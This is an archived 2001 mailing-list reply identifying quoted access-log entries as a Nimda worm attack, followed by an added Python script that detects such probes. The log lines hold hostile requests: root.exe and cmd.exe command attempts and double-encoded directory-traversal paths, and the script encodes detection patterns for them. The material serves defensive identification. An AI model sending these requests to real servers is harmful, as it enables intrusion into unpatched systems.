Re: Nimda


Subject: Re: Nimda
From: nathan_buck (nathb@efn.org)
Date: Fri Sep 21 2001 - 13:53:23 MDT


Yep, that's a Nimda attack.

On Fri, 21 Sep 2001, Brian Watson wrote:

> 24.129.1.10 - - [18/Sep/2001:13:11:31 -0400] "GET
> /scripts/root.exe?/c+dir HTTP$
> 24.129.1.10 - - [18/Sep/2001:13:11:31 -0400] "GET
> /MSADC/root.exe?/c+dir HTTP/1$
> 24.129.1.10 - - [18/Sep/2001:13:11:32 -0400] "GET
> /c/winnt/system32/cmd.exe?/c+$
> 24.129.1.10 - - [18/Sep/2001:13:11:33 -0400] "GET
> /d/winnt/system32/cmd.exe?/c+$
> 24.129.1.10 - - [18/Sep/2001:13:11:34 -0400] "GET
> /scripts/..%255c../winnt/syst$
> 24.129.1.10 - - [18/Sep/2001:13:11:34 -0400] "GET
> /_vti_bin/..%255c../..%255c..$
> 24.129.1.10 - - [18/Sep/2001:13:11:35 -0400] "GET
> /_mem_bin/..%255c../..%255c..$
>
> Is this a Nimda infected machine?
>
> --Brian
>

-----[nathan]---[http://kanga.i85.net]-------[nathb@efn.org]-----[monkey]---
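
One way to flag this request pattern in a web server access log, as an added example that is not part of the thread or either poster's code. It assumes Common Log Format with each entry on a single line; the sample entries, their addresses and status codes are constructed, and the function names and the `min_kinds` threshold are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)')

def classify(target):
    """Return the set of probe indicators present in one request target."""
    path = target.split("?", 1)[0]
    # Decode twice: %255c -> %5c -> "\" (the double-encoded backslash in the quoted log).
    decoded = unquote(unquote(path)).replace("\\", "/").lower()
    hits = set()
    if "%25" in path.lower():
        hits.add("double-encoding")   # an encoded "%" hiding a second escape
    if "../" in decoded:
        hits.add("traversal")         # climbs out of the web root once decoded
    if decoded.endswith("/root.exe"):
        hits.add("root.exe")
    if decoded.endswith("/cmd.exe"):
        hits.add("cmd.exe")
    return hits

def scan(lines, min_kinds=2):
    """Group indicators per client; report clients showing >= min_kinds distinct kinds."""
    seen = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            seen[m.group(1)] |= classify(m.group(3))
    return {ip: sorted(kinds) for ip, kinds in seen.items() if len(kinds) >= min_kinds}

# Constructed sample entries (documentation addresses, not the host from the post).
SAMPLE = [
    '192.0.2.10 - - [18/Sep/2001:13:11:31 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210',
    '192.0.2.10 - - [18/Sep/2001:13:11:32 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218',
    '192.0.2.10 - - [18/Sep/2001:13:11:34 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232',
    '192.0.2.77 - - [18/Sep/2001:13:12:02 -0400] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.77 - - [18/Sep/2001:13:12:05 -0400] "GET /docs/a%20b.html HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for ip, kinds in scan(SAMPLE).items():
        print(ip, ", ".join(kinds))
```

Requiring several distinct indicators from one client within the log separates a scripted probe run like the one quoted from a single stray request.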


